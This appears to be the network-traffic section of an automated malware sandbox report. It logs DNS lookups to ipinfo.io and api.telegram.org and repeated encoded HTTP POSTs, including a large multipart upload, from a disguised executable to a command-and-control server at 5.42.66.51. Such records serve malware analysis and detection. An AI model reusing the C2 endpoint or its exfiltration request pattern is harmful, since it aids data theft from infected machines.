                                                                                                Oct 11, 2024 20:39:39.259982109 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.259982109 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.265069962 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.607671976 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:39.770451069 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.770889044 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:39.771028996 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.351897955 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.353585958 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.353708029 CEST80500925.42.66.51192.168.2.5
                                                                                                Oct 11, 2024 20:39:40.353719950 CEST5009280192.168.2.55.42.66.51
                                                                                                Oct 11, 2024 20:39:40.353854895 CEST5009280192.168.2.55.42.66.51

                                                                                                UDP Packets

                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                Oct 11, 2024 20:37:10.307019949 CEST5744853192.168.2.51.1.1.1
                                                                                                Oct 11, 2024 20:37:10.318670034 CEST53574481.1.1.1192.168.2.5
                                                                                                Oct 11, 2024 20:37:13.307430029 CEST6342553192.168.2.51.1.1.1
                                                                                                Oct 11, 2024 20:37:13.316646099 CEST53634251.1.1.1192.168.2.5

                                                                                                DNS Queries

                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                Oct 11, 2024 20:37:10.307019949 CEST192.168.2.51.1.1.10xbdcaStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                Oct 11, 2024 20:37:13.307430029 CEST192.168.2.51.1.1.10x4f6Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false

                                                                                                DNS Answers

                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                Oct 11, 2024 20:37:10.318670034 CEST1.1.1.1192.168.2.50xbdcaNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                Oct 11, 2024 20:37:13.316646099 CEST1.1.1.1192.168.2.50x4f6No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false

                                                                                                HTTP Request Dependency Graph

                                                                                                • ipinfo.io
                                                                                                • api.telegram.org
                                                                                                • 5.42.66.51

                                                                                                HTTP Packets

                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                0192.168.2.5497985.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:34.078788996 CEST381OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 336
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:37:34.439950943 CEST336OUTData Raw: 05 00 04 00 06 08 01 00 05 06 02 01 02 05 01 01 00 00 05 0e 02 05 03 08 01 0e 0f 02 05 06 06 02 0e 06 04 0d 03 00 07 00 0b 00 04 07 00 0b 02 00 03 0a 0c 0f 0c 0f 07 0a 05 07 06 54 01 0b 05 5d 00 05 0c 0b 00 00 04 06 0c 05 0b 00 0e 00 0c 04 06 02
                                                                                                Data Ascii: T]\L}Q~s}Z`mb[oU|j\vp]hxlQocjknPwtlAiO~V@AxCnN}uy
                                                                                                Oct 11, 2024 20:37:34.794745922 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:35.004265070 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:36.198700905 CEST1236INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:35 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 35 37 38 0d 0a 56 4a 7e 43 6f 6d 5a 5a 78 71 6b 5d 7f 4f 7b 00 7c 74 7c 53 7e 60 54 51 6e 5d 63 59 69 62 5d 5a 74 05 7a 55 79 62 75 01 62 65 68 48 7c 61 78 01 55 4b 71 4f 77 72 63 00 6b 5c 5c 58 7d 77 54 0c 6f 5f 6c 0c 7d 4d 51 01 62 72 79 41 60 61 5b 47 7c 5f 7e 05 7d 55 7f 50 7e 74 64 5f 75 4c 7b 06 7c 5c 53 02 7e 70 72 5b 6c 77 68 01 7b 77 63 5e 6c 54 77 04 79 72 5e 01 78 05 6d 5b 6b 59 6c 44 6f 5e 7c 01 7d 04 63 03 77 72 6f 5d 7a 51 41 5b 7f 01 7c 0d 7c 61 79 0c 62 7c 5e 4e 7b 7c 59 5d 60 4e 76 40 7a 4f 62 5a 7e 7c 62 07 7b 07 65 5a 61 4d 55 49 62 62 78 06 60 07 72 50 7e 5d 7a 06 76 71 7d 01 61 66 60 09 68 55 76 5d 60 6f 70 04 7c 63 6c 06 6f 6c 5d 03 7b 5e 65 5b 7c 6d 78 08 74 77 6c 07 7e 62 61 50 7e 7d 60 55 7b 0b 6d 5d 7f 72 76 5e 7b 5d 46 51 68 7c 7c 0d 7f 70 64 0a 6a 64 72 07 78 7d 5a 5e 6f 5b 7c 4b 7e 61 67 01 7e 49 78 53 68 5e 57 0d 79 5d 68 4c 7d 72 78 48 77 4d 5b 51 7b 5c 79 00 77 76 5a 03 7d 48 78 07 7f 66 7d 40 77 4c 7f 44 7d 62 79 4d 7d 77 7e 08 78 66 5a 0c 7d 5d 6b 04 76 4c 5f 4c 74 [TRUNCATED]
                                                                                                Data Ascii: 578VJ~ComZZxqk]O{|t|S~`TQn]cYib]ZtzUybubehH|axUKqOwrck\\X}wTo_l}MQbryA`a[G|_~}UP~td_uL{|\S~pr[lwh{wc^lTwyr^xm[kYlDo^|}cwro]zQA[||ayb|^N{|Y]`Nv@zObZ~|b{eZaMUIbbx`rP~]zvq}af`hUv]`op|clol]{^e[|mxtwl~baP~}`U{m]rv^{]FQh||pdjdrx}Z^o[|K~ag~IxSh^Wy]hL}rxHwM[Q{\ywvZ}Hxf}@wLD}byM}w~xfZ}]kvL_LtOiqz~RtN}Iu_Yzr[~`ixIZ{w|y}{xbtI{MvN|p^xI^I|rsvqd~R{JYR|aew|tAxRdFv`zzqy~RX{aPwsoua|vqf~pzvbaMueZB}LwRhLM|xlgxpj}Rwgp~bz}SUAzmbL~LyO`|@}|^~`Z}Ybxms{rdF|Ow~I]O~`}@zsx~\xFvs[y_ywf|E|vt}HSBtLcI}buwrxf|~]wr}Atay|_PH~|xN}YcKv_s{\yG}p}xgpMxYlL{}kxb`{]~{]NZ{gd|b`^vX|}o|X}dUkaXQbUtOzlpHwNfzX~]}Rz_z\y\}b`g{ZL~JxYe_w}MuetBjXvo`k]x{o`^l`[^kStcYQ[}bvOzSYQ`q}@T[\\hl{oSokURkLftq^Tdbq]DUmZ[PZMhbAm`cXQa{dZZvRUb@baxAzXg]jua@tahYavYhdbxXhipd\urmw_i|z}sSyYBqXV\WzCWc\CT_Mlkla|~\ZXzt|]K{YxF~L{^tv^ioEP{gVSb_aUPkxp_UPLvjQyD|\DXb`E[rMc[Liy[cTCZXpxSY]A{oSsAQA[oeEQ~AcUCh}TiZNWRy [TRUNCATED]
                                                                                                Oct 11, 2024 20:37:36.199012995 CEST200INData Raw: 63 01 54 7d 5d 56 5c 64 5b 63 02 70 71 5c 4e 57 58 43 5a 74 71 7b 5c 69 65 08 40 52 7a 6e 56 58 61 07 55 6b 04 09 04 50 5d 61 40 53 67 77 4e 69 70 67 59 77 5f 72 60 6c 4c 71 43 78 58 57 5d 52 0b 77 4a 54 64 56 43 5a 59 0b 5a 57 05 6e 45 57 7c 72
                                                                                                Data Ascii: cT}]V\d[cpq\NWXCZtq{\ie@RznVXaUkP]a@SgwNipgYw_r`lLqCxXW]RwJTdVCZYZWnEW|rb^@l`pUdDVng]otubVslkxZu|YbbGQp`\Sd^kL\UCoohRnf}zSt|\DXb`E[rMc[Li}A[XjEZ\oMU}][ol\~^s|T|TwqqP
                                                                                                Oct 11, 2024 20:37:36.317935944 CEST162INData Raw: 6e 6f 40 58 64 77 5e 79 5f 40 51 69 0b 60 4e 56 7e 4f 07 6a 04 5c 42 6a 06 49 50 56 7f 55 09 54 63 63 54 7a 59 58 5d 7b 7d 73 46 78 4c 74 48 7c 4c 7b 40 7a 5e 52 54 53 07 72 4b 50 60 5d 45 52 5a 0c 42 5b 05 05 56 55 6d 62 02 62 75 64 5b 7c 5b 78
                                                                                                Data Ascii: no@Xdw^y_@Qi`NV~Oj\BjIPVUTccTzYX]{}sFxLtH|L{@z^RTSrKP`]ERZB[VUmbbud[|[xC~HiMtrs}uyF{^WUT{KW`V@ZZXb\TXDjk|yXtGbmx@l~S_RnTsGWQg0
                                                                                                Oct 11, 2024 20:37:38.070677042 CEST357OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 384
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:38.287925005 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:38.288165092 CEST384OUTData Raw: 59 5e 43 5c 5f 5a 55 5a 54 57 5b 54 52 56 57 54 58 53 58 5c 5b 59 55 5d 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y^C\_ZUZTW[TRVWTXSX\[YU]_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.@$:#>))431!&#Y;3;=87;!P9==>,Z-"_$,P,
                                                                                                Oct 11, 2024 20:37:38.513144016 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:38 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 3a 02 35 3f 0d 16 3e 30 39 13 2f 2a 35 13 31 22 21 00 27 38 37 5a 35 5c 37 03 2d 3d 33 1f 31 03 20 05 2a 5a 26 57 27 01 33 5b 24 01 2b 5d 0d 10 25 07 24 55 3d 01 29 16 28 1c 2d 2e 0f 07 33 07 3a 5b 36 07 2f 16 21 2e 35 5d 32 02 30 18 32 3d 2a 0e 3c 24 25 58 2d 2c 06 00 25 04 2f 55 0f 11 3b 0e 25 3f 3c 13 21 5b 30 0b 20 2f 2c 5f 20 3f 22 5f 20 0d 0a 05 25 3a 30 05 27 2c 0f 00 3e 0d 02 0e 2a 54 36 00 32 03 22 0f 28 22 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 98:5?>09/*51"!'87Z5\7-=31 *Z&W'3[$+]%$U=)(-.3:[6/!.5]202=*<$%X-,%/U;%?<![0 /,_ ?"_ %:0',>*T62"(""S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                1192.168.2.5498515.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:42.460701942 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:42.821448088 CEST2552OUTData Raw: 59 5d 46 5b 5f 53 55 58 54 57 5b 54 52 5f 57 5d 58 54 58 5f 5b 5e 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y]F[_SUXTW[TR_W]XTX_[^U\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-0:<[*8>W)<3*5%;X87((%7>-.=?1,.+"_$,P,'
                                                                                                Oct 11, 2024 20:37:43.144619942 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:43.274619102 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:43 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                2192.168.2.5498525.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:42.540322065 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2052
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:37:42.888708115 CEST2052OUTData Raw: 59 53 43 5c 5a 5a 50 5a 54 57 5b 54 52 5b 57 52 58 56 58 59 5b 5a 55 58 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YSC\ZZPZTW[TR[WRXVXY[ZUX_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.$9?>8"*6Z$1"5X;'((2#(1S9.)[>1Y9;"_$,P,7
                                                                                                Oct 11, 2024 20:37:43.255204916 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:43.382978916 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:43 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 1e 21 01 01 16 29 33 3a 0f 3b 2a 32 0c 25 1c 3d 01 31 01 23 14 35 39 3f 03 39 2d 2c 0e 32 5c 3f 5b 2b 2c 2e 55 24 59 3c 00 27 11 2b 5d 0d 10 25 05 30 30 32 1c 2b 38 01 0c 2e 10 32 5f 25 2d 3a 5a 35 07 2f 51 22 07 3a 02 31 02 28 51 25 3d 29 1d 28 1a 32 05 3b 12 09 5f 25 2e 2f 55 0f 11 38 1c 27 3c 27 07 22 04 3f 55 34 06 24 5d 20 2c 3d 02 34 55 2c 00 24 2a 3c 03 27 3c 39 02 2a 30 27 1f 28 21 29 5d 26 04 29 1c 28 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989!)3:;*2%=1#59?9-,2\?[+,.U$Y<'+]%002+8.2_%-:Z5/Q":1(Q%=)(2;_%./U8'<'"?U4$] ,=4U,$*<'<9*0'(!)]&)("S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                3192.168.2.5498645.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:44.435651064 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2052
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:44.795135975 CEST2052OUTData Raw: 59 5f 43 5d 5a 5f 55 5e 54 57 5b 54 52 5f 57 51 58 57 58 5b 5b 58 55 5c 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y_C]Z_U^TW[TR_WQXWX[[XU\_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.A094]=]1>6$09!&;;0$Z*;1#2-:=([-"_$,P,'


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                4192.168.2.5498795.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:46.661664963 CEST382OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Connection: Keep-Alive
                                                                                                Oct 11, 2024 20:37:47.015513897 CEST2552OUTData Raw: 5c 59 46 5a 5f 5b 55 5a 54 57 5b 54 52 5c 57 5d 58 5f 58 5d 5b 5e 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: \YFZ_[UZTW[TR\W]X_X][^UW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX-0:7=;1?6('Y*!5#Y8)+&!;1Q.[&)7/;"_$,P,+
                                                                                                Oct 11, 2024 20:37:47.361632109 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:47.500583887 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:47 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                5192.168.2.5498845.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:47.660424948 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:48.019743919 CEST2552OUTData Raw: 59 5a 43 5c 5f 53 55 5b 54 57 5b 54 52 5b 57 53 58 55 58 5c 5b 58 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: YZC\_SU[TW[TR[WSXUX\[XUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C$_3)]:V*6<$?*\6%$/ $X>8*!;"--?"#9;"_$,P,7
                                                                                                Oct 11, 2024 20:37:48.372127056 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:48.509737968 CEST200INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:48 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                6192.168.2.5498865.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:47.862186909 CEST358OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2052
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:48.216985941 CEST2052OUTData Raw: 59 5c 46 5d 5a 59 55 5c 54 57 5b 54 52 5f 57 54 58 52 58 5d 5b 55 55 57 5f 5b 42 50 55 5b 59 5d 5d 5f 50 5e 57 5d 55 55 5c 5a 50 5b 5c 59 54 59 5b 5c 5c 5f 5a 52 58 52 52 5d 5a 5c 50 5f 50 5c 59 5f 59 5e 5f 5f 59 51 5f 5f 5f 5e 58 5d 5a 57 5b 5c
                                                                                                Data Ascii: Y\F]ZYU\TW[TR_WTXRX][UUW_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRYVTT_T[V_WVHXRTZ[^X[QCYZ\_UIZV]TYY_YSU[Y[U[_ZRGQ\_ZPVX.C0*/*82) _3*6%;8 \)(4;1Q.5*?.;"_$,P,'
                                                                                                Oct 11, 2024 20:37:48.543601990 CEST25INHTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:37:48.670655012 CEST349INHTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:37:48 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 39 38 0d 0a 0f 12 39 59 22 11 01 5e 3d 0d 0b 1c 2f 2a 08 0e 26 31 3e 59 26 28 37 5a 35 5c 3c 11 2d 00 0e 0d 32 3a 3c 00 2a 2f 3a 1d 25 2f 27 5a 33 01 2b 5d 0d 10 26 5b 33 23 0c 58 2b 2b 24 56 2c 3e 32 59 30 3d 3e 15 21 58 27 1b 21 07 39 17 26 2f 3b 0a 31 04 39 56 3c 1a 29 58 3b 12 30 07 26 04 2f 55 0f 11 38 1c 25 2f 23 02 23 3e 24 0e 20 2c 34 59 34 3f 36 1d 34 0a 2b 11 25 04 33 1f 31 12 3e 13 2a 1d 2b 1d 3d 0c 25 17 25 04 29 12 3c 18 22 53 2e 00 22 53 0d 32 57 4d 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 989Y"^=/*&1>Y&(7Z5\<-2:<*/:%/'Z3+]&[3#X++$V,>2Y0=>!X'!9&/;19V<)X;0&/U8%/##>$ ,4Y4?64+%31>*+=%%)<"S."S2WM0


                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                7192.168.2.5498965.42.66.51808412C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                TimestampBytes transferredDirectionData
                                                                                                Oct 11, 2024 20:37:48.937841892 CEST404OUTPOST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: multipart/form-data; boundary=----I9nNPSHYdg1RY1Gju0uTq58PsHKk1qoBdy
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 119102
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:37:49.311574936 CEST12360OUTData Raw: 2d 2d 2d 2d 2d 2d 49 39 6e 4e 50 53 48 59 64 67 31 52 59 31 47 6a 75 30 75 54 71 35 38 50 73 48 4b 6b 31 71 6f 42 64 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                                Data Ascii: ------I9nNPSHYdg1RY1Gju0uTq58PsHKk1qoBdyContent-Disposition: form-data; name="0"Content-Type: text/plainYRCP_ZP^TW[TRVWUXUX_[_U[_[BPU[Y]]_P^W]UU\ZP[\YTY[\\_ZRXRR]Z\P_P\Y_Y^__YQ___^X]ZW[\[PPA[YQ]TZXZPU\\B^[ZGYZZ\T^R[Z][T^[QU]X\Y]^^XSQRY
